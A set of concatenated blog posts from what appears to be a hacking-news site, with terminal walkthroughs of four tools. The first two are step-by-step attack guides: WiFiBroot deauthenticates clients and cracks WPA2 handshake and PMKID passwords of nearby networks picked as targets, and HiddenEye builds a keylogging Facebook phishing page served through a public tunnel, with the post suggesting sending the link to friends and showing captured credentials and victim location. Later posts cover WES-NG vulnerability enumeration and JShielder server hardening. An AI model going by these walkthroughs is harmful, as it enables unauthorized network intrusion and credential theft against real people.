• Open terminal type git clone https://github.com/hash3liZer/WiFiBroot.git
• Type cd WiFiBroot && ls

root@kali:/home/iicybersecurity/Downloads# git clone https://github.com/hash3liZer/WiFiBroot.git
 Cloning into 'WiFiBroot'…
 remote: Enumerating objects: 3, done.
 remote: Counting objects: 100% (3/3), done.
 remote: Compressing objects: 100% (3/3), done.
 remote: Total 276 (delta 0), reused 1 (delta 0), pack-reused 273
 Receiving objects: 100% (276/276), 504.20 KiB | 347.00 KiB/s, done.
 Resolving deltas: 100% (166/166), done.
 root@kali:/home/iicybersecurity/Downloads# cd WiFiBroot/
 root@kali:/home/iicybersecurity/Downloads/WiFiBroot# ls
 dicts          handshakes  pull.py    screen.py  wifibroot.py
 exceptions.py  LICENSE     README.md  utils      wireless

• Type python wifibroot.py

root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py
 Traceback (most recent call last):
   File "wifibroot.py", line 19, in 
     from wireless import Shifter
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/init.py", line 3, in 
     from wireless.cracker import PSK
   File "/home/iicybersecurity/Downloads/WiFiBroot/wireless/cracker.py", line 6, in 
     from pbkdf2 import PBKDF2
 ImportError: No module named pbkdf2

• If the above error encounters, type pip install pbkdf2
• Then type python wifibroot.py

root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py -h

 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

Syntax:
     $ python wifibroot.py [--mode [modes]] [--options]
     $ python wifibroot.py --mode 2 -i wlan1mon --verbose -d /path/to/list -w pmkid.txt
 Modes:
     #     Description                                 Value
     01    Capture 4-way handshake and crack MIC code    1
     02    Captures and Crack PMKID (PMKID Attack)       2
     03    Perform Manaul cracking on available
           capture types. See --list-types               3
     04    Deauthentication. Disconnect two stations
           and jam the traffic.                          4
 Use -h, --help after -m, --mode to get help on modes.

Capture & Crack Four-Way Handshake :-

• Type python wifibroot.py –mode 1 –type handshake -i wlan0mon –verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt
• –mode 1 is used to crack four way handshake
• -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
• –verbose is used to print hash values.
• -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.

root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 1 --type handshake -i wlan0mon --verbose -d /home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt

 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {/home/iicybersecurity/Downloads/WiFiBroot/dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

  NO  ESSID           PWR  ENC    CIPHER    AUTH      CH  BSSID              VENDOR      CL
----  ------------  -----  -----  --------  ------  ----  -----------------  --------  ----
   1  HATHWAY         -38  WPA2   CCMP      PSK       10  8C:E1:17:8D:5C:E4  zte          2
   2  ZTE-ae1e0e      -40  WPA2   CCMP      PSK        1  88:5D:FB:AE:1E:0E  zte          0
   3  MTNL_HOTSPOT    -78  WPA2   TKIP      PSK       11  0C:D2:B5:2C:55:5D  Binatone     1
   4  Neon`Sunny      -87  WPA2   TKIP      PSK        1  34:E3:80:41:F8:68  Genexis      0
   5  TP-LINK_D9D6    -87  WPA2   CCMP      PSK        1  98:DE:D0:A7:D9:D6  TP-LINK      0

• Press Ctrl + C for stopping the scan. Here our target is MTNL_HOTSPOT
• Enter 3 for cracking MTNL_HOTSPOT

 [] Changing Channel to 11 [SuccessFul]  

• Enter n

[?] AP Clients [1] Scan Further?[Y/n] n 
[] Time Interval [15] -> Implies Gap b/w Frames is 15

• Then it send de-authentication to the connected clients. Below shows one devices is connected with AP.

[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication] 
[^] 32-> 8CBEBE314C0F (Xiaomi) >< 0CD2B52C555D (Binatone) [Deauthentication]

• As the user will enter password in their own device. Wifibroot will capture the handshake & the password.

[+] Handshake 0CD2B52C555D (Binatone) [Captured]
[!] Handshake not saved. Use -w, --write for saving handshakes.
[^] Current Password: 29054367
[+] Found: 29054367
 [>] PMK:
 00000000:  74 0a ac 04 01 16 0c dd  73 fb 4e fa 50 17 18 7f  |t…….s.N.P…|
 00000010:  a1 c0 92 36 45 20 94 15  79 42 17 bb e2 21 5d 42  |…6E…yB…!]B|
 [>] PTK:
 00000000:  95 5f ee 82 ca c3 a2 b5  b1 a1 75 4a 11 a2 d8 05  |._……..uJ….|
 00000010:  49 08 62 ec 2b b9 e6 12  13 bd f8 53 7a 0d ce a0  |I.b.+……Sz…|
 00000020:  5c 4f d1 ca 04 32 4c bb  f4 6a 27 21 83 26 b3 ad  |\O…2L..j'!.&..|
 00000030:  84 42 fb e4 49 b7 e4 e2  65 03 58 d2 30 f2 35 cb  |.B..I…e.X.0.5.|
 [>] MIC:
 00000000:  da 86 9b 74 b7 d5 aa 67  2a 7d 78 aa 30 0e df e4  |…t…g*}x.0…|
 00000010:  29 9a d2 de                                       |)…|

• Above shows current password is 29054367
• All these scenarios are the part of ethical hacking courses offered by International Institute of Cyber Security

Capture & Crack PMKID :-

• Type python wifibroot.py –mode 2 -i wlan0mon –verbose -d dicts/list.txt -w output.txt
• –mode 2 is used capture & crack PMKID.
• -i wlan0mon is the wifi adapter used in cracking Wifi networks. For cracking we are using TP-Link TL – WN722N V1
• –verbose is used to print hash values.
• -d is used for dictionary path. For testing we are using Wifibroot inbuilt dictionary. You can use any wordlist or crunch for cracking Wifi Passwords.
• -w output.txt will save PMKID.

root@kali:/home/iicybersecurity/Downloads/WiFiBroot# python wifibroot.py --mode 2 -i wlan0mon --verbose -d dicts/list.txt -w output.txt

 _        ___  ___ ___  ___   ___
 \\  _ /\*\___*\__\\__\/   \ /   \\___
  \  \\  \\\   \\__\\ /\  ) \\  ) \\  \
   \__\\__\\\   \\__\\ \\__ / \___/ \__\

          v1.0. Coded by @hash3liZer.

[*] Path: {dicts/list.txt} Lines {42}
[~] Channel Specified: NONE Hopper Status [Running]
[^] Scanning! Press [CTRL+C] to stop.

• Press Ctrl + C for stopping the scan. Here our target is new_T03_T1

NO  ESSID                               PWR  ENC       CIPHER    AUTH      CH  BSSID              VENDOR      CL
 ----  --------------------------------  -----  --------  --------  ------  ----  -----------------  --------  ----
    1  Pankaj@9212458712                   -23  WPA2      CCMP      PSK        6  18:A6:F7:9B:27:DC  TP-LINK      0
    2  Cbi                                 -29  WPA2      CCMP      PSK        2  00:E0:4C:3B:37:08  REALTEK      0
    3  naidus                              -45  WPA       CCMP      PSK        2  C8:3A:35:0B:26:08  Tenda        0
    4  Lucky                               -47  WPA2      TKIP      PSK        1  54:B8:0A:07:82:D2  D-Link       0
    5  new_T03_T1                          -50  WPA2      TKIP      PSK       11  90:8D:78:F2:95:E3  D-Link       3
    6  DIRECT-28-HP DeskJet 2600 series    -59  WPA2      CCMP      PSK        6  B4:B6:86:65:DC:29  Hewlett      0
    7  Worldview@37                        -76  WPA2      CCMP      PSK        1  04:95:E6:A2:58:20  Tenda        0
    8  Sushil@WVC9312408388                -84  WPA       CCMP      PSK       11  0C:D2:B5:3D:0D:3C  Binatone     0
    9  Excitel                             -85  WPA2      CCMP      PSK        6  00:1E:A6:DB:B3:C0  Best         0
   10  Bunty                               -86  WPA2      CCMP      PSK        7  04:95:E6:87:AB:48  Tenda        0
   11  Excitel@43                          -86  WPA2/WPA  CCMP      PSK        7  C8:3A:35:46:BA:F8  Tenda        0
   12  Worldview@tanpreet                  -88  WPA2      TKIP      PSK       13  A0:AB:1B:D9:09:08  D-Link       0

• Enter 5 for cracking new_T03_T1

[^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 2 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [^] 1 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Open Authentication]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Open Authentication] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
 [^] 4 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [^] 3 Frames C04A0016044D (TP-LINK) > 908D78F295E3 (D-Link) [Association Request]
 [] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] [] Authentication 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [SuccessFull]
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Waiting…] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] Received C04A0016044D (TP-LINK) < 908D78F295E3 (D-Link) [Association Response] 
[] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [Initiated]
[^] EAPOL 908D78F295E3 (D-Link) > C04A0016044D (TP-LINK) [1 of 4]
[~] Vulnerable to PMKID Attack!
[^] PMKID 908D78F295E3 (D-Link) [a31f70cc4ed5cabb67ae4d56f11ec0b6]
[+] PMKID -> [output.txt] [Saved]
[^] Currently Checking: accessme
[+] Password Found: accessme
[>] PMKID:
 00000000:  61 33 31 66 37 30 63 63  34 65 64 35 63 61 62 62  |a31f70cc4ed5cabb|
 00000010:  36 37 61 65 34 64 35 36  66 31 31 65 63 30 62 36  |67ae4d56f11ec0b6|
 [>] PMK:
 00000000:  93 89 96 03 d0 e8 ab bd  e8 8b f1 1b fb 8f 05 18  |…………….|
 00000010:  58 1e e3 cb 6d 2b ff 0d  b4 96 b4 fa 74 57 bd 77  |X…m+……tW.w| 

• Above shows target Access Point password.

The post Crack any WIFI password With WifiBroot appeared first on Information Security Newspaper | Hacking News.

Even phishing is still most popular cyber attack used by many attackers/ spammers. We will show python script written in python. Modern phishing tool is used phishing tool which gives wide variety of social networks.

• For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7, wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
• After installing above requirements. Type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
• Then type cd HiddenEye && ls
• Type pip3 install -r requirements.txt
• Type python3 HiddenEye.py
• Type y

HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y

• Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>

• Type 3

 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3

• Type Y

        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------

[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y

• Type www.facebook.com

        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------

**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com

• Type 443

[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443

• Type 2

[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2

• Type 2

[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

• Open another temrinal & go to below location cd /home/iicybersecurity/HiddenEye/ Server/www/ && php -S 127.0.0.1:443 > /dev/null

root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 

• As you will open https://127.0.0.1:443 in your web browser. You will see victim interaction where you have started server.
• Enter username & password.
• For sending fake page to your friends you can send fake email to your friends using public URL generated, in this case it is https://viduo.seveo.net. You can send https://viduo.seveo.net & you can also check using your loopback URL for testing on Ubuntu machine, https://127/0/0/1:443

• After entering username & password. You will found login credentials in terminal where you have started HiddenEye.py

…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….

• Above you can see login credentials
• All these scenarios are demonstrated in ethical hacking courses offered by International Institute of Cyber Security

The post Hack your friends Facebook account using HiddenEye appeared first on Information Security Newspaper | Hacking News.

WES-NG Windows Exploit Suggester is a tool based on Windows systeminfo utility. It provides list of vulnerabilities which includes exploits of Windows OS. All Windows version including Windows server versions is supported.

• For testing we will use Windows 10 1809 64 Bit. Make sure that Windows is configured with python3.
• For installing python go to : https://www.python.org/downloads/
• After downloading install python for all users. If the python path is not set automatically. Set path in Windows enviroment variables.
• Go to My computer properties < Advanced < Enviroment Variables < System Variables
• Click on New & in Variable type Path then enter Value C:\Program Files (x86)\Python37-32\Scripts\
• Type python –version

• After configuring the python. Download the WES-NG from : https://github.com/bitsadmin/wesng
• After downloading, unzip the WES-NG. Then open CMD (Command Prompt) as administrator
• Go to location where you have download & unziped the WES-NG.

• Then open another cmd as adminstrator & gather system configuration. For that type systeminfo.exe

• Copy system info into text file. Type systeminfo > systeminfo.txt

• An new text file will be created. Copy the systeminfo.txt into wesng-master folder.
• Then execute wes.py systeminfo.txt
• Now wes-ng will start finding vulnerabilities on the basis of system information.

• Above screenshots shows 116 vulnerabilities of Windows 1809. We have posted some vulnerabilities to show how tool works. These type of tools are quite often used by Ethical hacking researcher.
• If you open any vulnerability for ex – we have open last CVE 2019-1081. As wes-ng finds vulnerabiltiy in CVE & exploitdb.

• Above shows the disclousure vulnerability in microsoft browsers improperly handle objects in memory.
• Wes-ng updates list of definitions from : https://raw.githubusercontent.com/bitsadmin/wesng/master/definitions.zip to show the list CVEs and exploits of given operating system.

The post All-New Windows Exploit Suggester is here, WES-NG appeared first on Information Security Newspaper | Hacking News.

LAMP

LAMP is an open source utility used for creating web applications. Lamp is also specified as Lamp stack because it consists of four layers.

Lamp stands for (Linux, Apache, MySQL and PHP). Many developers used LAMP to develop & deploy web application. JShielder is used to secure Linux servers in which developers want to deploy their web applications. Jshielder automates the process of installing required packages to host web applications. In other words JShielder act as a Server Hardening (Server Hardening is a process to enhance server security) Some common tips of server hardening includes :-

• Data Encryption for communication.
• Changes protocols which sends important information in plain text.
• Closes unnecessary services running on server.
• Keep OS up to date, specially the security patches & malware removal tools.
• Regularly update security policies.
• Maintains & regularly checks the server logs.

JShielder Requires following configuration:-

• Configures a Hostname
• Reconfigures the Timezone
• Updates the entire System
• Creates a New Admin user so you can manage your server safely without the need of doing remote connections with root.
• Helps user Generate Secure RSA Keys, so that remote access to your server is done exclusive from your local pc and no Conventional password
• Configures, Optimize and secures the SSH Server (Some Settings Following CIS Benchmark)
• Configures IPTABLES Rules to protect the server from common attacks
  Disables unused FileSystems and Network protocols
• Protects the server against Brute Force attacks by installing a configuring fail2ban
• Installs and Configure Artillery as a Honeypot, Monitoring, Blocking and Alerting tool
• Installs PortSentry
• Install, configure, and optimize MySQL
• Install the Apache Web Server
• Install, configure and secure PHP
• Secure Apache via configuration file and with installation of the Modules ModSecurity, ModEvasive, Qos and SpamHaus
• Secures NginX with the Installation of ModSecurity NginX module
  Installs RootKit Hunter
• Secures Root Home and Grub Configuration Files
• Installs Unhide to help Detect Malicious Hidden Processes
• Installs Tiger, A Security Auditing and Intrusion Prevention system
• Restrict Access to Apache Config Files
• Disables Compilers
• Creates Daily Cron job for System Updates
• Kernel Hardening via sysctl configuration File (Tweaked)
  /tmp Directory Hardening
• PSAD IDS installation
• Enables Process Accounting
• Enables Unattended Upgrades MOTD and Banners for Unauthorized access
• Disables USB Support for Improved Security (Optional)
• Configures a Restrictive Default UMASK
• Configures and enables Auditd
• Configures Auditd rules following CIS Benchmark
• Sysstat install
• ArpWatch install
• Additional Hardening steps following CIS Benchmark Secures Cron
• Automates the process of setting a GRUB Bootloader Password
  Secures Boot Settings
• Sets Secure File Permissions for Critical System Files

According to ethical hacking researcher of International Institute of Cyber Security, all the above points are required by network administrators to secure their servers.

JShielder Installation ;-

• For testing we will use Ubuntu 18.04 LTS. Before using JShielder LAMP must installed & configured in your Linux system. LAMP is just XAMPP which mostly used on Windows OS.
• For installing LAMP open terminal type sudo apt-get update && For installing mysql type sudo apt- get install mysql-server mysql-client

root@ubuntu:/home/iicybersecurity# sudo apt-get update
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
root@ubuntu:/home/iicybersecurity# sudo apt-get install mysql-server
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server-5.7
   mysql-server-core-5.7
 Suggested packages:
   libipc-sharedcache-perl mailx tinyca
 The following NEW packages will be installed:
   libaio1 libevent-core-2.1-6 libhtml-template-perl mysql-client-5.7 mysql-client-core-5.7 mysql-server mysql-server-5.7
   mysql-server-core-5.7

• For installing apache type sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert

root@ubuntu:/home/iicybersecurity# sudo apt-get install apache2 apache2-doc apache2-utils libexpat1 ssl-cert
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 ssl-cert is already the newest version (1.0.39).
 libexpat1 is already the newest version (2.2.5-3ubuntu0.1).
 The following additional packages will be installed:
   apache2-bin apache2-data libapr1 libaprutil1 libaprutil1-dbd-sqlite3 libaprutil1-ldap liblua5.2-0
 Suggested packages:
   apache2-suexec-pristine | apache2-suexec-custom
 The following NEW packages will be installed:
   apache2 apache2-bin apache2-data apache2-doc apache2-utils libapr1 libaprutil1 libaprutil1-dbd-sqlite3
   libaprutil1-ldap liblua5.2-0

• For installing PHP type sudo apt-get install php && sudo apt-get install phpmyadmin This command will ask to reconfigure apache server. You have to select apache & then it will ask to configure password for myql. Enter secure password & all the dependencies will be configured. Password should be highly secure as it is always communicated in the day one class of International Institute of Cyber Security (IICS, iiCyberSecurity)

root@ubuntu:/home/iicybersecurity# sudo apt-get install php
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   libapache2-mod-php7.2 php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 Suggested packages:
   php-pear
 The following NEW packages will be installed:
   libapache2-mod-php7.2 php php-common php7.2 php7.2-cli php7.2-common php7.2-json php7.2-opcache php7.2-readline
 0 upgraded, 9 newly installed, 0 to remove and 387 not upgraded.
 Need to get 3,863 kB of archives.
root@ubuntu:/home/iicybersecurity# sudo apt-get install phpmyadmin
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 The following additional packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip
 Suggested packages:
   php-libsodium php-mcrypt php-gmp php-imagick
 The following NEW packages will be installed:
   dbconfig-common dbconfig-mysql libjs-sphinxdoc libzip4 php-bz2 php-curl php-gd php-mbstring php-mysql php-pear
   php-php-gettext php-phpseclib php-tcpdf php-xml php-zip php7.2-bz2 php7.2-curl php7.2-gd php7.2-mbstring php7.2-mysql
   php7.2-xml php7.2-zip phpmyadmin

• Now type git clone https://github.com/Jsitech/JShielder.git

root@ubuntu:/home/iicybersecurity/Downloads# git clone https://github.com/Jsitech/JShielder.git
 Cloning into 'JShielder'…
 remote: Enumerating objects: 70, done.
 remote: Counting objects: 100% (70/70), done.
 remote: Compressing objects: 100% (44/44), done.
 remote: Total 1192 (delta 48), reused 46 (delta 26), pack-reused 1122
 Receiving objects: 100% (1192/1192), 1.09 MiB | 764.00 KiB/s, done.
 Resolving deltas: 100% (624/624), done.

• Then type cd JShielder && ls JShielder is developed in bash script.

root@ubuntu:/home/iicybersecurity# cd Downloads/JShielder/
root@ubuntu:/home/iicybersecurity/Downloads/JShielder# ls
 'CentOS_7(Under Development)'   jshielder.sh   LICENSE   README.md   UbuntuServer_16.04LTS   UbuntuServer_18.04LTS

• Type ./jshielder.sh

root@myserver1:/home/iicybersecurity/Downloads/JShielder# ./jshielder.sh

     ██╗███████╗██╗  ██╗██╗███████╗██╗     ██████╗ ███████╗██████╗
     ██║██╔════╝██║  ██║██║██╔════╝██║     ██╔══██╗██╔════╝██╔══██╗
     ██║███████╗███████║██║█████╗  ██║     ██║  ██║█████╗  ██████╔╝
██   ██║╚════██║██╔══██║██║██╔══╝  ██║     ██║  ██║██╔══╝  ██╔══██╗
╚█████╔╝███████║██║  ██║██║███████╗███████╗██████╔╝███████╗██║  ██║
╚════╝ ╚══════╝╚═╝  ╚═╝╚═╝╚══════╝╚══════╝╚═════╝ ╚══════╝╚═╝  ╚═╝

Automated Hardening Script for Linux Servers
Developed By Jason Soto @JsiTech
---------------------------------------------------------------------------------------------------------
[+] SELECT YOUR LINUX DISTRIBUTION
---------------------------------------------------------------------------------------------------------

1. Ubuntu Server 16.04 LTS
2. Ubuntu Server 18.04 LTS
3. Linux CentOS 7 (Coming Soon)
4. Debian GNU/Linux 8 (Coming Soon)
5. Debian GNU/Linux 9 (Coming Soon)
6. Red Hat Linux 7 (Coming Soon)
7. Exit

2

• Type 2

[+] SELECT THE DESIRED OPTION
1. LAMP Deployment
2. LEMP Deployment
3. Reverse Proxy Deployment With Apache
4. Running With SecureWPDeployer or JSDeployer Script
5. Customized Run (Only run desired Options)
6. CIS Benchmark Hardening
Exit
 
1

• Type 1

[+] Setting some Prerequisites
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]'universe' distribution component is already enabled for all sources.
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then it will display that universal distributed component is enabled. Press enter to configure further.
• Enter Y & type mysql1
• And then enter www.testsite1.com

¿Do you Wish to Set a HostName? (y/n): y
Type a Name to Identify this server :
  (For Example: myserver): mysql1
¿Type Domain Name?:www.testsite1.com

Creating legal Banners for unauthorized access
 [ +++++++++++++++++++++++++++++++++++++++++++++++++++++   ]OK
 Done.
  To EXIT Press x Key, Press ENTER to Continue

• Then configure timezone.

[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'

• Then select country.

[+] We will now Configure the TimeZone
 Current default time zone: 'America/Los_Angeles'
 Local time is now:      Wed Jul 17 22:31:34 PDT 2019.
 Universal Time is now:  Thu Jul 18 05:31:34 UTC 2019.
 Done.

  To EXIT Press x Key, Press ENTER to Continue

• Then server will run an update. This command will search for available updates for the system. & will install required updates.
• It might take time depending on your internet speed.

[+] Updating the System
 Hit:1 https://security.ubuntu.com/ubuntu bionic-security InRelease
 Hit:2 https://us.archive.ubuntu.com/ubuntu bionic InRelease
 Hit:3 https://us.archive.ubuntu.com/ubuntu bionic-updates InRelease
 Hit:4 https://us.archive.ubuntu.com/ubuntu bionic-backports InRelease
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 387 packages can be upgraded. Run 'apt list --upgradable' to see them.
 Reading package lists… Done
 Building dependency tree
 Reading state information… Done
 Calculating upgrade… Done
 The following package was automatically installed and is no longer required:
   libllvm7
 Use 'sudo apt autoremove' to remove it.
 The following NEW packages will be installed:
   gstreamer1.0-gtk3 libllvm8 linux-headers-4.18.0-25 linux-headers-4.18.0-25-generic linux-image-4.18.0-25-generic
   linux-modules-4.18.0-25-generic linux-modules-extra-4.18.0-25-generic python3-dateutil
 The following packages will be upgraded:

apport apport-gtk apt apt-utils aptdaemon aptdaemon-data bash bind9-host binutils binutils-common
